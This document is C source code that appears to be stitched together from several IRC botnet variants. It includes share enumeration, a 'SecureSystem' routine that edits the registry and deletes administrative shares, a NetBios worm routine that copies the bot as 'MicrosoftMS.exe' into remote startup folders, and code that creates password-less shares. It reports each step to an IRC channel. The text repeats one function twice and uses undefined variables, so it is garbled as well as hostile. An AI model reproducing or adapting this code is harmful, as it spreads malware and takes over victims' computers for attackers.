BOOL ListShares(SOCKET sock, char *chan, BOOL notice, char *ServerName)
{
char buffer[IRCLINE];
PSHARE_INFO_502 pBuf,p;
NET_API_STATUS nStatus;
LPWSTR wServerName = (LPWSTR)AsWideString(ServerName);
DWORD entriesread=0,totalread=0,resume=0;
irc_privmsg(sock,chan,"Share name: Resource: Uses: Desc:",notice);
do {
nStatus = fNetShareEnum(wServerName, 502, (LPBYTE *) &pBuf, -1, &entriesread, &totalread, &resume);
if(nStatus == ERROR_SUCCESS || nStatus == ERROR_MORE_DATA) {
p = pBuf;
for(unsigned int i=1;i <= entriesread;i++) {
sprintf(buffer,"%-14S %-24S %-6u %-4s",p->shi502_netname, p->shi502_path, p->shi502_current_uses, IsVSD(fIsValidSecurityDescriptor(p->shi502_security_descriptor)));
irc_privmsg(sock,chan,buffer,notice,TRUE);
p++;
}
fNetApiBufferFree(pBuf);
} else {
sprintf(buffer,"-\x03\x34\2net\2\x03- share list error %s <%ld>",NasError(nStatus),nStatus);
irc_privmsg(sock,chan,buffer,notice);
}
} while (nStatus == ERROR_MORE_DATA);
if(nStatus != ERROR_SUCCESS)
return FALSE;
return TRUE;
}
BOOL SecureSystem(SOCKET sock, char *chan, BOOL notice, BOOL silent)
{
char sendbuf[IRCLINE];
if (!noadvapi32) {
HKEY hKey;
if(fRegOpenKeyEx(HKEY_LOCAL_MACHINE, regkey3, 0, KEY_READ|KEY_WRITE, &hKey) == ERROR_SUCCESS) {
TCHAR szDataBuf[]="N";
if(fRegSetValueEx(hKey, "EnableDCOM", NULL, REG_SZ, (LPBYTE)szDataBuf, strlen(szDataBuf)) != ERROR_SUCCESS)
sprintf(sendbuf,"4<<12[SECURE]: Disable DCOM failed.4>>");
else
sprintf(sendbuf,"4<<12[SECURE]: DCOM disabled.4>>");
fRegCloseKey(hKey);
} else
sprintf(sendbuf,"4<<12[SECURE]: Failed to open DCOM registry key.4>>");
if (!silent) irc_privmsg(sock,chan, sendbuf, notice, TRUE);
addlog(sendbuf);
if (fRegOpenKeyEx(HKEY_LOCAL_MACHINE, regkey4, 0, KEY_ALL_ACCESS, &hKey) == ERROR_SUCCESS) {
DWORD dwData = 0x00000001;
if (fRegSetValueEx(hKey, "restrictanonymous", 0, REG_DWORD, (LPBYTE) &dwData, sizeof(DWORD)) != ERROR_SUCCESS)
sprintf(sendbuf,"4<<12[SECURE]: Failed to restrict access to the IPC$ Share.4>>");
else
sprintf(sendbuf,"4<<12[SECURE]: Restricted access to the IPC$ Share.4>>");
fRegCloseKey(hKey);
} else
sprintf(sendbuf,"4<<12[SECURE]: Failed to open IPC$ Restriction registry key.4>>");
} else
sprintf(sendbuf,"4<<12[SECURE]: Advapi32.dll couldn't be loaded.4>>");
if (!silent) irc_privmsg(sock,chan, sendbuf, notice, TRUE);
addlog(sendbuf);
if (!nonetapi32) {
PSHARE_INFO_502 pBuf,p;
NET_API_STATUS nStatus;
DWORD entriesread=0,totalread=0,resume=0;
do {
nStatus = fNetShareEnum(NULL, 502, (LPBYTE *) &pBuf, -1, &entriesread, &totalread, &resume);
if(nStatus == ERROR_SUCCESS || nStatus == ERROR_MORE_DATA) {
p = pBuf;
for(unsigned int i=1;i <= entriesread;i++) {
if (p->shi502_netname[wcslen(p->shi502_netname)-1] == '$') {
if(ShareDel(NULL,AsAnsiString(p->shi502_netname)) == NERR_Success)
_snprintf(sendbuf,sizeof(sendbuf),"nz m (secure.p l g) »» Share '%S' deleted.",p->shi502_netname);
else
_snprintf(sendbuf,sizeof(sendbuf),"nz m (secure.p l g) »» Failed to delete '%S' share.",p->shi502_netname);
if (!silent) irc_privmsg(sock,chan,sendbuf,notice, TRUE);
addlog(sendbuf);
}
p++;
}
fNetApiBufferFree(pBuf);
} else {
for(int i=0;i < (sizeof(ShareList) / sizeof (NetShares));i++) {
if(ShareDel(NULL,ShareList[i].ShareName) == NERR_Success)
_snprintf(sendbuf,sizeof(sendbuf),"4<<12[SECURE]: Share '%S' deleted.4>>",ShareList[i].ShareName);
else
_snprintf(sendbuf,sizeof(sendbuf),"4<<12[SECURE]: Failed to delete '%S' share.4>>",ShareList[i].ShareName);
if (!silent) irc_privmsg(sock,chan,sendbuf,notice, TRUE);
addlog(sendbuf);
}
}
} while (nStatus == ERROR_MORE_DATA);
sprintf(sendbuf,"4<<12[SECURE]: Network shares deleted.4>>");
} else
sprintf(sendbuf,"4<<12[SECURE]: Netapi32.dll couldn't be loaded.4>>");
if (!silent) irc_privmsg(sock,chan, sendbuf, notice);
addlog(sendbuf);
return TRUE;
}
BOOL SecureSystem(SOCKET sock, char *chan, BOOL notice, BOOL silent)
{
char sendbuf[IRCLINE];
if (!noadvapi32) {
HKEY hKey;
if(fRegOpenKeyEx(HKEY_LOCAL_MACHINE, regkey3, 0, KEY_READ|KEY_WRITE, &hKey) == ERROR_SUCCESS) {
TCHAR szDataBuf[]="N";
if(fRegSetValueEx(hKey, "EnableDCOM", NULL, REG_SZ, (LPBYTE)szDataBuf, strlen(szDataBuf)) != ERROR_SUCCESS)
sprintf(sendbuf,"[SECURE]: Disable DCOM failed.");
else
sprintf(sendbuf,"[SECURE]: DCOM disabled.");
fRegCloseKey(hKey);
} else
sprintf(sendbuf,"[SECURE]: Failed to open DCOM registry key.");
if (!silent) irc_privmsg(sock,chan, sendbuf, notice, TRUE);
addlog(sendbuf);
if (fRegOpenKeyEx(HKEY_LOCAL_MACHINE, regkey4, 0, KEY_ALL_ACCESS, &hKey) == ERROR_SUCCESS) {
DWORD dwData = 0x00000001;
if (fRegSetValueEx(hKey, "restrictanonymous", 0, REG_DWORD, (LPBYTE) &dwData, sizeof(DWORD)) != ERROR_SUCCESS)
sprintf(sendbuf,"[SECURE]: Failed to restrict access to the IPC$ Share.");
else
sprintf(sendbuf,"[SECURE]: Restricted access to the IPC$ Share.");
fRegCloseKey(hKey);
} else
sprintf(sendbuf,"[SECURE]: Failed to open IPC$ Restriction registry key.");
if (!silent) irc_privmsg(sock,chan, sendbuf, notice, TRUE);
addlog(sendbuf);
if (fRegOpenKeyEx(HKEY_LOCAL_MACHINE, regkey4, 0, KEY_ALL_ACCESS, &hKey) == ERROR_SUCCESS) {
DWORD dwData = 0x00000001;
if (fRegSetValueEx(hKey, "restrictanonymoussam", 0, REG_DWORD, (LPBYTE) &dwData, sizeof(DWORD)) != ERROR_SUCCESS)
sprintf(sendbuf,"[SECURE]: Failed to restrict anonymous enumeration of SAM accounts.");
else
sprintf(sendbuf,"[SECURE]: Restricted anonymous enumeration of SAM accounts.");
fRegCloseKey(hKey);
} else
sprintf(sendbuf,"[SECURE]: Failed to open enumeration of SAM accounts registry key.");
if (!silent) irc_privmsg(sock,chan, sendbuf, notice, TRUE);
addlog(sendbuf);
#ifndef NO_LSARESTRICT
DWORD dwRet;
if ((dwRet = SearchForPrivilegedAccounts(L"SeNetworkLogonRight", FALSE)) > 0)
sprintf(sendbuf,"[SECURE]: Removed SeNetworkLogonRights from %d accounts in local system policy.", dwRet);
else
sprintf(sendbuf,"[SECURE]: Failed to remove SeNetworkLogonRights from any accounts in local system policy.");
#endif
} else
sprintf(sendbuf,"[SECURE]: Advapi32.dll couldn't be loaded.");
if (!silent) irc_privmsg(sock,chan, sendbuf, notice, TRUE);
addlog(sendbuf);
#ifndef NO_NET
if (!nonetapi32) {
PSHARE_INFO_502 pBuf,p;
NET_API_STATUS nStatus;
DWORD entriesread=0,totalread=0,resume=0;
do {
nStatus = fNetShareEnum(NULL, 502, (LPBYTE *) &pBuf, -1, &entriesread, &totalread, &resume);
if(nStatus == ERROR_SUCCESS || nStatus == ERROR_MORE_DATA) {
p = pBuf;
for(unsigned int i=1;i <= entriesread;i++) {
if (p->shi502_netname[wcslen(p->shi502_netname)-1] == '$') {
char* szShareName = new char[wcslen(p->shi502_netname)+1];
WideCharToMultiByte(CP_ACP, WC_NO_BEST_FIT_CHARS, p->shi502_netname, -1, szShareName, sizeof(szShareName), NULL, NULL);
if(ShareDel(NULL,szShareName) == NERR_Success)
_snprintf(sendbuf,sizeof(sendbuf),"[SECURE]: Share '%S' deleted.",p->shi502_netname);
else
_snprintf(sendbuf,sizeof(sendbuf),"[SECURE]: Failed to delete '%S' share.",p->shi502_netname);
if (!silent) irc_privmsg(sock,chan,sendbuf,notice, TRUE);
addlog(sendbuf);
delete szShareName;
}
p++;
}
fNetApiBufferFree(pBuf);
} else {
for(int i=0;i < (sizeof(ShareList) / sizeof (NetShares));i++) {
if(ShareDel(NULL,ShareList[i].ShareName) == NERR_Success)
_snprintf(sendbuf,sizeof(sendbuf),"[SECURE]: Share '%s' deleted.",ShareList[i].ShareName);
else
_snprintf(sendbuf,sizeof(sendbuf),"[SECURE]: Failed to delete '%s' share.",ShareList[i].ShareName);
if (!silent) irc_privmsg(sock,chan,sendbuf,notice, TRUE);
addlog(sendbuf);
}
}
} while (nStatus == ERROR_MORE_DATA);
sprintf(sendbuf,"[SECURE]: Network shares deleted.");
} else
sprintf(sendbuf,"[SECURE]: Netapi32.dll couldn't be loaded.");
if (!silent) irc_privmsg(sock,chan, sendbuf, notice);
addlog(sendbuf);
#endif
return TRUE;
}
BOOL NetBios(char * Addr)
{
char szRemoteAddr[MAX_PATH];
sprintf(szRemoteAddr,"\\\\%s",Addr);
HINSTANCE netapi32_dll = LoadLibrary("netapi32.dll");
if (netapi32_dll) {
fNetShareEnum = (RSP5) GetProcAddress(netapi32_dll, "NetShareEnum");
//fNetApiBufferFree = (NABF) GetProcAddress(netapi32_dll, "NetApiBufferFree");
if (!fNetShareEnum || !fNetApiBufferFree) {
//not xp/2000 ?
return 2;
}
}
else
return 2; //dll's not found
wchar_t wcRemoteAddr[MAX_PATH] = L"";
mbstowcs(wcRemoteAddr, szRemoteAddr, strlen(szRemoteAddr) + 1);
PSHARE_INFO_1 BufPtr,p;
NET_API_STATUS res;
DWORD er=0,tr=0,resume=0, i;
char thisfilename[MAX_PATH];
char remotefilename[MAX_PATH];
char remoteinifilename[MAX_PATH];
char sendbuf[512];
GetModuleFileName(NULL,thisfilename,sizeof(thisfilename));
do
{
res = fNetShareEnum ((CHAR *) wcRemoteAddr, 1, (LPBYTE *) &BufPtr, -1, &er, &tr, &resume);
if(res == ERROR_SUCCESS || res == ERROR_MORE_DATA)
{
p=BufPtr;
for(i=1;i<=er;i++)
{
if (p->shi1_type == STYPE_DISKTREE)
{
int s;
for (s=0;startupdirs[s] != NULL;s++)
{
memset(remotefilename,0,sizeof(remotefilename));
sprintf(remotefilename,"%s\\%s\\%s\\MicrosoftMS.exe",szRemoteAddr,p->shi1_netname,startupdirs[s]);
if (CopyFile(thisfilename,remotefilename,TRUE) != 0) {
_snprintf(buffer,sizeof(buffer),"[NetBios]: Exploiting IP: %s",remotefile);
irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice);
fNetApiBufferFree(BufPtr);
FreeLibrary(netapi32_dll);
return 1;
}
}
}
p++;
}
fNetApiBufferFree(BufPtr);
}
else {
FreeLibrary(netapi32_dll);
return 1;
}
}
while (res==ERROR_MORE_DATA);
FreeLibrary(netapi32_dll);
return 1;
}
void SecureShares(BOOL secure, void *conn, char *target, BOOL silent, BOOL verbose, BOOL loop)
{
IRC* irc=(IRC*)conn;
char sendbuf[IRCLINE];
char tmpBuffer[IRCLINE];
int shdel=0;
int shmake=0;
if (secure)
{
PSHARE_INFO_502 pBuf,p;
NET_API_STATUS nStatus;
DWORD entriesread=0,totalread=0,resume=0;
if (!loop && !silent)
sprintf(sendbuf,"%s Shares %s:",sec_title,"erased");
do
{
nStatus=fNetShareEnum(NULL,502,(LPBYTE *)&pBuf,-1,&entriesread,&totalread,&resume);
if(nStatus == ERROR_SUCCESS || nStatus == ERROR_MORE_DATA)
{
p = pBuf;
for(unsigned int i=1;i <= entriesread;i++)
{
if (p->shi502_netname[wcslen(p->shi502_netname)-1] == '$')
{
if(fNetShareDel(NULL,(unsigned short *)p->shi502_netname,0) == NERR_Success)
{
if (!loop && !silent && verbose)
{
if (shdel>0)
strcat(sendbuf,",");
sprintf(tmpBuffer," %S",p->shi502_netname);
strcat(sendbuf,tmpBuffer);
}
shdel++;
}
}
p++;
}
fNetApiBufferFree(pBuf);
}
else
{
for(int i=0;i < (sizeof(ShareList)/sizeof(*ShareList));i++)
{
if(fNetShareDel(NULL,(unsigned short *)ShareList[i].ShareName,0) == NERR_Success)
{
if (!loop && !silent && verbose)
{
if (shdel>0)
strcat(sendbuf,",");
sprintf(tmpBuffer," %S",ShareList[i].ShareName);
strcat(sendbuf,tmpBuffer);
}
shdel++;
}
}
}
} while (nStatus == ERROR_MORE_DATA);
if (verbose && !loop && !silent)
{
if (shdel==0)
irc->privmsg(target,"%s No shares %s.",sec_title,"erased");
else
{
sprintf(tmpBuffer," - Total shares %s: %d.","erased",shdel);
strcat(sendbuf,tmpBuffer);
irc->privmsg(target,sendbuf);
}
}
else if (!loop && !silent && !verbose)
{
if (shdel==0)
irc->privmsg(target,"%s No shares %s.",sec_title,"erased");
else
{
irc->privmsg(target,"%s Total shares %s: %d.",sec_title,"erased",shdel);
}
}
}
else
{ // Unsecure
if (!loop && !silent)
sprintf(sendbuf,"%s Shares %s:",unsec_title,"created");
NET_API_STATUS res;
SHARE_INFO_2 p;
DWORD parm_err = 0;
for (int i=0;i < (sizeof(ShareList) / sizeof (*ShareList));i++)
{
p.shi2_netname = (unsigned short *)TEXT(ShareList[i].ShareName);
p.shi2_type = STYPE_DISKTREE;
p.shi2_remark = (unsigned short *)TEXT("rofl");
p.shi2_permissions = 0;
p.shi2_max_uses = 4;
p.shi2_current_uses = 0;
p.shi2_path = (unsigned short *)TEXT(ShareList[i].SharePath);
p.shi2_passwd = NULL;
res=fNetShareAdd(NULL,2,(LPBYTE)&p,&parm_err);
if(res==0)
{
if (!loop && !silent && verbose)
{
if (shmake>0)
strcat(sendbuf,",");
sprintf(tmpBuffer," %S",ShareList[i].ShareName);
strcat(sendbuf,tmpBuffer);
}
shmake++;
}
}
if (verbose && !loop && !silent)
{
if (shmake==0)
irc->privmsg(target,"%s No shares %s.",unsec_title,"created");
else
{
sprintf(tmpBuffer," - Total shares %s: %d.","created",shmake);
strcat(sendbuf,tmpBuffer);
irc->privmsg(target,sendbuf);
}
}
else if (!verbose && !silent && !loop)
{
if (shmake==0)
irc->privmsg(target,"%s No shares %s.",unsec_title,"created");
else
{
irc->privmsg(target,"%s Total shares %s: %d.",unsec_title,"created",shmake);
}
// addlog(MAINLOG,sendbuf);
}
}
return;
}
